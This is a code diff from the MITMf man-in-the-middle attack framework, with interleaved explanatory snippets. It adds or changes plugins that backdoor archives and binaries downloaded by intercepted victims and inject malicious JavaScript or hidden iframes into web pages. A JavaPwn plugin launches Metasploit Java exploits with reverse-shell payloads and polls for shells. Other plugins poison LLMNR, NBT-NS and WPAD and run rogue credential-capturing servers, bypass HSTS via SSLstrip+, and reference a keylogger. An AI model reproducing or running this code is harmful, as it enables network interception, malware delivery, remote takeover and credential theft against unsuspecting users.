||||||
|
|
||||||
|
zippyfile.extractall(tmpDir)
|
||||||
|
|
||||||
|
patchCount = 0
|
||||||
|
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
print "[*] >>> Next file in zipfile:", info.filename
|
||||||
|
|
||||||
|
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
||||||
|
print info.filename, 'is a directory'
|
||||||
|
continue
|
||||||
|
|
||||||
|
#Check against keywords
|
||||||
|
keywordCheck = False
|
||||||
|
|
||||||
|
if type(self.zipblacklist) is str:
|
||||||
|
if self.zipblacklist.lower() in info.filename.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
|
||||||
|
else:
|
||||||
|
for keyword in self.zipblacklist:
|
||||||
|
if keyword.lower() in info.filename.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
continue
|
||||||
|
|
||||||
|
if keywordCheck is True:
|
||||||
|
print "[!] Zip blacklist enforced!"
|
||||||
|
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
||||||
|
continue
|
||||||
|
|
||||||
|
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||||
|
|
||||||
|
if patchResult:
|
||||||
|
patchCount += 1
|
||||||
|
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||||
|
print "[*] Patching complete, adding to zip file."
|
||||||
|
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||||
|
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
|
else:
|
||||||
|
print "[!] Patching failed"
|
||||||
|
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
||||||
|
|
||||||
|
print '-' * 10
|
||||||
|
|
||||||
|
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
||||||
|
mitmf_logger.info("Met Zip config patchCount limit.")
|
||||||
|
break
|
||||||
|
|
||||||
|
zippyfile.close()
|
||||||
|
|
||||||
|
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
||||||
|
|
||||||
|
print "[*] Writing to zipfile:", tmpFile
|
||||||
|
|
||||||
|
for base, dirs, files in os.walk(tmpDir):
|
||||||
|
for afile in files:
|
||||||
|
filename = os.path.join(base, afile)
|
||||||
|
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
||||||
|
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||||
|
|
||||||
|
zipResult.close()
|
||||||
|
#clean up
|
||||||
|
shutil.rmtree(tmpDir)
|
||||||
|
|
||||||
|
with open(tmpFile, 'rb') as f:
|
||||||
|
tempZipFile = f.read()
|
||||||
|
os.remove(tmpFile)
|
||||||
|
|
||||||
|
if wasPatched is False:
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
self.patched.put(tempZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
content_header = request.client.headers['Content-Type']
|
||||||
|
client_ip = request.client.getClientIP()
|
||||||
|
|
||||||
|
if content_header in self.zipMimeTypes:
|
||||||
|
|
||||||
|
if self.bytes_have_format(data, 'zip'):
|
||||||
|
mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_zip = self.patched.get()
|
||||||
|
|
||||||
|
if bd_zip:
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_zip}
|
||||||
|
|
||||||
|
else:
|
||||||
|
for tartype in ['gz','bz','tar']:
|
||||||
|
if self.bytes_have_format(data, tartype):
|
||||||
|
mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_tar = self.patched.get()
|
||||||
|
|
||||||
|
if bd_tar:
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_tar}
|
||||||
|
|
||||||
|
|
||||||
|
elif content_header in self.binaryMimeTypes:
|
||||||
|
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||||
|
if self.bytes_have_format(data, bintype):
|
||||||
|
mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
|
||||||
|
fd, tmpFile = mkstemp()
|
||||||
|
with open(tmpFile, 'w') as f:
|
||||||
|
f.write(data)
|
||||||
|
|
||||||
|
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
patchb = self.patched.get()
|
||||||
|
|
||||||
|
if patchb:
|
||||||
|
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||||
|
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||||
|
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||||
|
return {'request': request, 'data': bd_binary}
|
||||||
|
|
||||||
|
else:
|
||||||
|
mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
||||||
|
return {'request': request, 'data': data}
|
|
@ -53,18 +53,6 @@ class Inject(CacheKill, Plugin):
|
||||||
self.match_str = options.match_str
|
self.match_str = options.match_str
|
||||||
self.html_payload = options.html_payload
|
self.html_payload = options.html_payload
|
||||||
|
|
||||||
if self.white_ips:
|
|
||||||
temp = []
|
|
||||||
for ip in self.white_ips.split(','):
|
|
||||||
temp.append(ip)
|
|
||||||
self.white_ips = temp
|
|
||||||
|
|
||||||
if self.black_ips:
|
|
||||||
temp = []
|
|
||||||
for ip in self.black_ips.split(','):
|
|
||||||
temp.append(ip)
|
|
||||||
self.black_ips = temp
|
|
||||||
|
|
||||||
if self.options.preserve_cache:
|
if self.options.preserve_cache:
|
||||||
self.implements.remove("handleHeader")
|
self.implements.remove("handleHeader")
|
||||||
self.implements.remove("connectionMade")
|
self.implements.remove("connectionMade")
|
||||||
|
@ -82,8 +70,8 @@ class Inject(CacheKill, Plugin):
|
||||||
#If you have MSF on another host, you may need to check prior to injection
|
#If you have MSF on another host, you may need to check prior to injection
|
||||||
#print "http://" + request.client.getRequestHostname() + request.uri
|
#print "http://" + request.client.getRequestHostname() + request.uri
|
||||||
ip, hn, mime = self._get_req_info(request)
|
ip, hn, mime = self._get_req_info(request)
|
||||||
if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip):
|
||||||
if hn not in self.proxyip: #prevents recursive injecting
|
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
||||||
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
||||||
self.ctable[ip] = time.time()
|
self.ctable[ip] = time.time()
|
||||||
self.dtable[ip+hn] = True
|
self.dtable[ip+hn] = True
|
||||||
@@ -95,39 +83,28 @@ class Inject(CacheKill, Plugin):

    def _get_payload(self):
        return self._get_js() + self._get_iframe() + self.html_payload

-   def add_options(self, options):
-       options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
-       options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
-       options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
-       options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
-       options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
-       options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
-       group = options.add_mutually_exclusive_group(required=False)
-       group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
-       group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
-       group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
-       group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
-       group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
-
-   def _should_inject(self, ip, hn, mime):
+   def _ip_filter(self, ip):

        if self.white_ips is not None:
-           if ip in self.white_ips:
+           if ip in self.white_ips.split(','):
                return True
            else:
                return False

        if self.black_ips is not None:
-           if ip in self.black_ips:
+           if ip in self.black_ips.split(','):
                return False
            else:
                return True

+       return True
+
+   def _should_inject(self, ip, hn, mime):

        if self.count_limit == self.rate_limit is None and not self.per_domain:
            return True

        if self.count_limit is not None and self.count > self.count_limit:
-           #print "1"
            return False

        if self.rate_limit is not None:
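For clarity, the whitelist/blacklist behaviour that the new _ip_filter() encapsulates can be sketched as a standalone function (illustrative only; the comma-separated string format for --white-ips/--black-ips follows the plugin code above):

def ip_allowed(ip, white_ips=None, black_ips=None):
    """Mirrors Inject._ip_filter(): a whitelist, if set, is authoritative;
    otherwise a blacklist excludes; otherwise every client gets injected."""
    if white_ips is not None:
        return ip in white_ips.split(',')
    if black_ips is not None:
        return ip not in black_ips.split(',')
    return True

# Example: only whitelisted clients receive the payload
print(ip_allowed("10.0.0.5", white_ips="10.0.0.5,10.0.0.6"))  # True
print(ip_allowed("10.0.0.9", white_ips="10.0.0.5,10.0.0.6"))  # False
print(ip_allowed("10.0.0.9", black_ips="10.0.0.9"))           # False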
@@ -176,3 +153,17 @@ class Inject(CacheKill, Plugin):
            data = re.sub(r, post[i][1]+"\g<match>", data)

        return data

+   def add_options(self, options):
+       options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
+       options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
+       options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
+       options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
+       options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
+       options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
+       group = options.add_mutually_exclusive_group(required=False)
+       group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
+       group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
+       group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
+       group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
+       group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
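Note that --per-domain, --rate-limit, --count-limit, --white-ips and --black-ips sit in a mutually exclusive group, so argparse rejects any combination of them. A minimal self-contained sketch of that wiring (a stand-alone parser for illustration, not the MITMf entry point):

import argparse

parser = argparse.ArgumentParser(description="Inject plugin options (illustrative)")
parser.add_argument("--js-url", type=str, help="Location of the Javascript to inject.")
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("--per-domain", action="store_true", default=False)
group.add_argument("--rate-limit", type=float, default=None)
group.add_argument("--count-limit", type=int, default=None)
group.add_argument("--white-ips", type=str, default=None)
group.add_argument("--black-ips", type=str, default=None)

# Accepted: one limiter/target filter at a time
print(parser.parse_args(["--js-url", "http://example.net/x.js", "--per-domain"]))
# Combining two of them (e.g. --per-domain --rate-limit 5) makes argparse exit with an error.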
plugins/JavaPwn.py (new file, 231 lines)
@@ -0,0 +1,231 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import string
import random
import threading
import sys
import logging

from time import sleep
from core.msfrpc import Msfrpc
from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler

mitmf_logger = logging.getLogger("mitmf")

class JavaPwn(BrowserProfiler, Plugin):
    name        = "JavaPwn"
    optname     = "javapwn"
    desc        = "Performs drive-by attacks on clients with out-of-date java browser plugins"
    tree_output = []
    version     = "0.3"
    has_opts    = False

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.msfip = SystemConfig.getIP(options.interface)

        try:
            msfcfg = options.configfile['MITMf']['Metasploit']
        except Exception, e:
            sys.exit("[-] Error parsing Metasploit options in config file: {}".format(e))

        try:
            self.javacfg = options.configfile['JavaPwn']
        except Exception, e:
            sys.exit("[-] Error parsing config for JavaPwn: {}".format(e))

        self.msfport = msfcfg['msfport']
        self.rpcip   = msfcfg['rpcip']
        self.rpcpass = msfcfg['rpcpass']

        #Initialize the BrowserProfiler plugin
        BrowserProfiler.initialize(self, options)
        self.black_ips = []

        try:
            self.msf = Msfrpc({"host": self.rpcip})  #create an instance of the msfrpc library
            self.msf.login('msf', self.rpcpass)
            version = self.msf.call('core.version')['version']
            self.tree_output.append("Connected to Metasploit v{}".format(version))
        except Exception:
            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")

    def onConfigChange(self):
        self.initialize(self.options)

    def startThread(self, options):
        self.pwn()

    def rand_url(self):  #generates a random url for our exploits (urls are generated with a / at the beginning)
        return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))

    def get_exploit(self, java_version):
        exploits = []

        client_vstring  = java_version[:-len(java_version.split('.')[3])-1]
        client_uversion = int(java_version.split('.')[3])

        for ver in self.javacfg['Multi'].iteritems():
            if type(ver[1]) is list:
                for list_vers in ver[1]:

                    version_string = list_vers[:-len(list_vers.split('.')[3])-1]
                    update_version = int(list_vers.split('.')[3])

                    if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
                        if client_uversion == update_version:
                            exploits.append(ver[0])
                    elif (client_vstring == version_string):
                        if client_uversion <= update_version:
                            exploits.append(ver[0])
            else:
                version_string = ver[1][:-len(ver[1].split('.')[3])-1]
                update_version = int(ver[1].split('.')[3])

                if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
                    if client_uversion == update_version:
                        exploits.append(ver[0])
                elif client_vstring == version_string:
                    if client_uversion <= update_version:
                        exploits.append(ver[0])

        return exploits

    def injectWait(self, url, client_ip):  #here we inject an iframe to trigger the exploit and check for resulting sessions
        #inject iframe
        mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip))
        #temporarily changes the code that the BrowserProfiler plugin injects
        self.html_payload = "<iframe src='http://{}:{}{}' height=0% width=0%></iframe>".format(self.msfip, self.msfport, url)

        mitmf_logger.info('{} >> waiting for ze shellz, Please wait...'.format(client_ip))

        exit = False
        i = 1
        while i <= 30:  #wait max 60 seconds for a new shell
            if exit:
                break
            shell = self.msf.call('session.list')  #poll metasploit every 2 seconds for new sessions
            if len(shell) > 0:
                for k, v in shell.iteritems():
                    if client_ip in shell[k]['tunnel_peer']:  #make sure the shell actually came from the ip that we targeted
                        mitmf_logger.info("{} >> Got shell!".format(client_ip))
                        self.sploited_ips.append(client_ip)  #target successfully owned :)
                        self.black_ips = self.sploited_ips   #add to the Inject blacklist since the box has been popped
                        exit = True
                        break
            sleep(2)
            i += 1

        if exit is False:  #we didn't get a shell :(
            mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip))

        self.html_payload = self.get_payload()  #restore the BrowserProfiler payload

    def send_command(self, cmd, vic_ip):
        try:
            mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip))

            #Create a virtual console
            console_id = self.msf.call('console.create')['id']

            #write the cmd to the newly created console
            self.msf.call('console.write', [console_id, cmd])

            mitmf_logger.info("{} >> commands sent successfully".format(vic_ip))
        except Exception, e:
            mitmf_logger.info('{} >> Error occurred while interacting with metasploit: {}:{}'.format(vic_ip, Exception, e))

    def pwn(self):
        self.sploited_ips = list()  #store ip of pwned or not vulnerable clients so we don't re-exploit

        while True:
            if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1':  #only choose clients that we are 100% sure have the java plugin installed and enabled

                brwprofile = self.dic_output  #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format

                if brwprofile['ip'] not in self.sploited_ips:  #continue only if the ip has not already been exploited

                    vic_ip = brwprofile['ip']

                    mitmf_logger.info("{} >> client has java version {} installed! Proceeding...".format(vic_ip, brwprofile['java_version']))
                    mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip))

                    exploits = self.get_exploit(brwprofile['java_version'])  #get correct exploit strings defined in javapwn.cfg

                    if exploits:

                        if len(exploits) > 1:
                            mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits)))
                            exploit = random.choice(exploits)
                            mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit))
                        else:
                            mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0]))
                            exploit = exploits[0]

                        #here we check to see if we already set up the exploit to avoid creating new jobs for no reason
                        jobs = self.msf.call('job.list')  #get running jobs
                        if len(jobs) > 0:
                            for k, v in jobs.iteritems():
                                info = self.msf.call('job.info', [k])
                                if exploit in info['name']:
                                    mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit))
                                    url = info['uripath']  #get the url assigned to the exploit
                                    self.injectWait(url, vic_ip)

                        else:  #here we setup the exploit
                            rand_port = random.randint(1000, 65535)  #generate a random port for the payload listener
                            rand_url = self.rand_url()
                            #generate the command string to send to the virtual console
                            #new line character very important as it simulates a user pressing enter
                            cmd  = "use exploit/{}\n".format(exploit)
                            cmd += "set SRVPORT {}\n".format(self.msfport)
                            cmd += "set URIPATH {}\n".format(rand_url)
                            cmd += "set PAYLOAD generic/shell_reverse_tcp\n"  #chose this payload because it can be upgraded to a full meterpreter and it's multi-platform
                            cmd += "set LHOST {}\n".format(self.msfip)
                            cmd += "set LPORT {}\n".format(rand_port)
                            cmd += "exploit -j\n"

                            mitmf_logger.debug("command string:\n{}".format(cmd))

                            self.send_command(cmd, vic_ip)

                            self.injectWait(rand_url, vic_ip)
                    else:
                        #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
                        mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip))
                        mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip))

                        rand_url = self.rand_url()
                        rand_port = random.randint(1000, 65535)

                        cmd  = "use exploit/multi/browser/java_signed_applet\n"
                        cmd += "set SRVPORT {}\n".format(self.msfport)
                        cmd += "set URIPATH {}\n".format(rand_url)
                        cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
                        cmd += "set LHOST {}\n".format(self.msfip)
                        cmd += "set LPORT {}\n".format(rand_port)
                        cmd += "exploit -j\n"

                        self.send_command(cmd, vic_ip)
                        self.injectWait(rand_url, vic_ip)
            sleep(1)
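get_exploit() matches the victim's Java version string (e.g. "1.7.0.17") against the version patterns configured under the JavaPwn "Multi" section: a leading "*" means "this exact update only", otherwise any update number up to the listed one matches. A minimal standalone sketch of that matching rule (the exploit names and version pairings below are illustrative, not taken from the shipped javapwn.cfg):

def matching_exploits(java_version, exploit_map):
    """Same matching rule as JavaPwn.get_exploit(), extracted for clarity.
    java_version: base version plus update number, e.g. "1.7.0.17"
    exploit_map:  {exploit_name: pattern or [patterns]}
                  "*1.7.0.17" -> only update 17 of 1.7.0 matches
                  "1.7.0.17"  -> any 1.7.0 update <= 17 matches"""
    base   = java_version.rsplit('.', 1)[0]
    update = int(java_version.rsplit('.', 1)[1])

    hits = []
    for name, patterns in exploit_map.items():
        if not isinstance(patterns, list):
            patterns = [patterns]
        for pat in patterns:
            pat_base   = pat.rsplit('.', 1)[0]
            pat_update = int(pat.rsplit('.', 1)[1])
            if pat_base.startswith('*'):
                if base == pat_base[1:] and update == pat_update:
                    hits.append(name)
            elif base == pat_base and update <= pat_update:
                hits.append(name)
    return hits

# Hypothetical config entries, same shape as javacfg['Multi']:
demo_cfg = {"multi/browser/java_jre17_jmxbean": "1.7.0.10",
            "multi/browser/java_atomicreferencearray": ["*1.7.0.2", "1.6.0.30"]}
print(matching_exploits("1.7.0.5", demo_cfg))   # only the jmxbean module matches
print(matching_exploits("1.7.0.2", demo_cfg))   # both modules match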
@@ -17,10 +17,12 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 #
+import logging

 from plugins.plugin import Plugin
 from plugins.Inject import Inject
-import logging
+
+mitmf_logger = logging.getLogger("mitmf")

 class jskeylogger(Inject, Plugin):
     name = "Javascript Keylogger"
plugins/Replace.py (new file, 105 lines)
@@ -0,0 +1,105 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

"""
Plugin by @rubenthijssen
"""

import sys
import logging
import time
import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill

mitmf_logger = logging.getLogger("mitmf")

class Replace(CacheKill, Plugin):
    name       = "Replace"
    optname    = "replace"
    desc       = "Replace arbitrary content in HTML content"
    implements = ["handleResponse", "handleHeader", "connectionMade"]
    depends    = ["CacheKill"]
    version    = "0.1"
    has_opts   = True

    def initialize(self, options):
        self.options = options

        self.search_str  = options.search_str
        self.replace_str = options.replace_str
        self.regex_file  = options.regex_file

        if (self.search_str is None or self.search_str == "") and self.regex_file is None:
            sys.exit("[-] Please provide a search string or a regex file")

        self.regexes = []
        if self.regex_file is not None:
            for line in self.regex_file:
                self.regexes.append(line.strip().split("\t"))

        if self.options.keep_cache:
            self.implements.remove("handleHeader")
            self.implements.remove("connectionMade")

        self.ctable = {}
        self.dtable = {}
        self.mime = "text/html"

    def handleResponse(self, request, data):
        ip, hn, mime = self._get_req_info(request)

        if self._should_replace(ip, hn, mime):

            if self.search_str is not None and self.search_str != "":
                data = data.replace(self.search_str, self.replace_str)
                mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))

            # Did the user provide us with a regex file?
            for regex in self.regexes:
                try:
                    data = re.sub(regex[0], regex[1], data)

                    mitmf_logger.info("%s [%s] Occurrences matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
                except Exception:
                    logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))

            self.ctable[ip] = time.time()
            self.dtable[ip+hn] = True

            return {'request': request, 'data': data}

        return

    def add_options(self, options):
        options.add_argument("--search-str", type=str, default=None, help="String you would like to search for and replace.")
        options.add_argument("--replace-str", type=str, default="", help="String to replace matches with. Default: '' (empty string)")
        options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
        options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")

    def _should_replace(self, ip, hn, mime):
        return mime.find(self.mime) != -1

    def _get_req_info(self, request):
        ip = request.client.getClientIP()
        hn = request.client.getRequestHostname()
        mime = request.client.headers['Content-Type']

        return (ip, hn, mime)
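The --regex-file format is one tab-separated pair per line: the pattern to match and its replacement. A small illustrative equivalent of what handleResponse() does with such a file (file contents and patterns here are made up for the example):

import re

# Hypothetical regex-file contents, one <regex>\t<replacement> per line:
regex_lines = [
    "Copyright \\d{4}\tCopyright 1984",
    "</body>\t<!-- replaced --></body>",
]

regexes = [line.strip().split("\t") for line in regex_lines]

data = "<html><body>Copyright 2015</body></html>"
for pattern, replacement in regexes:
    data = re.sub(pattern, replacement, data)

print(data)  # <html><body>Copyright 1984<!-- replaced --></body></html>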
@@ -19,18 +19,17 @@
 #

 import threading
+import sys

 from plugins.plugin import Plugin
 from twisted.internet import reactor
 from core.utils import SystemConfig

 from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
-from core.responder.wpad.WPADPoisoner import WPADPoisoner
 from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
 from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
 from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
 from core.responder.wpad.WPADPoisoner import WPADPoisoner
-from core.responder.kerberos.KERBServer import KERBServer

 class Responder(Plugin):
     name = "Responder"

@@ -48,18 +47,47 @@ class Responder(Plugin):

        try:
            config = self.config['Responder']
+           smbChal = self.config['MITMf']['SMB']['Challenge']
        except Exception, e:
            sys.exit('[-] Error parsing config for Responder: ' + str(e))

        LANFingerprinter().start(options)
        MDNSPoisoner().start(options, self.ourip)
-       KERBServer().start()
        NBTNSPoisoner().start(options, self.ourip)
        LLMNRPoisoner().start(options, self.ourip)

        if options.wpad:
+           from core.responder.wpad.WPADPoisoner import WPADPoisoner
            WPADPoisoner().start(options)

+       if self.config["Responder"]["MSSQL"].lower() == "on":
+           from core.responder.mssql.MSSQLServer import MSSQLServer
+           MSSQLServer().start(smbChal)
+
+       if self.config["Responder"]["Kerberos"].lower() == "on":
+           from core.responder.kerberos.KERBServer import KERBServer
+           KERBServer().start()
+
+       if self.config["Responder"]["FTP"].lower() == "on":
+           from core.responder.ftp.FTPServer import FTPServer
+           FTPServer().start()
+
+       if self.config["Responder"]["POP"].lower() == "on":
+           from core.responder.pop3.POP3Server import POP3Server
+           POP3Server().start()
+
+       if self.config["Responder"]["SMTP"].lower() == "on":
+           from core.responder.smtp.SMTPServer import SMTPServer
+           SMTPServer().start()
+
+       if self.config["Responder"]["IMAP"].lower() == "on":
+           from core.responder.imap.IMAPServer import IMAPServer
+           IMAPServer().start()
+
+       if self.config["Responder"]["LDAP"].lower() == "on":
+           from core.responder.ldap.LDAPServer import LDAPServer
+           LDAPServer().start(smbChal)
+
        if options.analyze:
            self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
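All of the per-protocol blocks above follow the same pattern: read the On/Off toggle, lazily import the rogue server only when it is needed, and pass the NTLM challenge to the servers that use it. Assuming only what the diff shows (each server class exposes a start() method), the same dispatch could be written table-driven; this is a sketch for illustration, not the plugin's actual code:

import importlib

def start_configured_servers(config, smb_challenge):
    """Toggle -> rogue-server mapping mirroring Responder.initialize().
    Each entry: config key -> (module path, class name, needs SMB challenge)."""
    servers = {
        "MSSQL":    ("core.responder.mssql.MSSQLServer",   "MSSQLServer", True),
        "Kerberos": ("core.responder.kerberos.KERBServer", "KERBServer",  False),
        "FTP":      ("core.responder.ftp.FTPServer",       "FTPServer",   False),
        "POP":      ("core.responder.pop3.POP3Server",     "POP3Server",  False),
        "SMTP":     ("core.responder.smtp.SMTPServer",     "SMTPServer",  False),
        "IMAP":     ("core.responder.imap.IMAPServer",     "IMAPServer",  False),
        "LDAP":     ("core.responder.ldap.LDAPServer",     "LDAPServer",  True),
    }
    for key, (modpath, clsname, needs_chal) in servers.items():
        if config["Responder"][key].lower() != "on":
            continue
        cls = getattr(importlib.import_module(modpath), clsname)  #lazy import, as in the plugin
        instance = cls()
        if needs_chal:
            instance.start(smb_challenge)
        else:
            instance.start()

The lazy imports keep protocol servers that are switched Off in the config from ever being loaded, which is what lets the toggles take effect on a config reload.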
plugins/SSLstrip+.py (new file, 51 lines)
@@ -0,0 +1,51 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import sys
import logging

from plugins.plugin import Plugin
from core.utils import IpTables
from core.sslstrip.URLMonitor import URLMonitor
from core.dnschef.DNSchef import DNSChef

class HSTSbypass(Plugin):
    name        = 'SSLstrip+'
    optname     = 'hsts'
    desc        = 'Enables SSLstrip+ for partial HSTS bypass'
    version     = "0.4"
    tree_output = ["SSLstrip+ by Leonardo Nve running"]
    has_opts    = False

    def initialize(self, options):
        self.options = options
        self.manualiptables = options.manualiptables

        if not options.manualiptables:
            if IpTables.getInstance().dns is False:
                IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port'])

        URLMonitor.getInstance().setHstsBypass()
        DNSChef.getInstance().setHstsBypass()

    def finish(self):
        if not self.manualiptables:
            if IpTables.getInstance().dns is True:
                IpTables.getInstance().Flush()
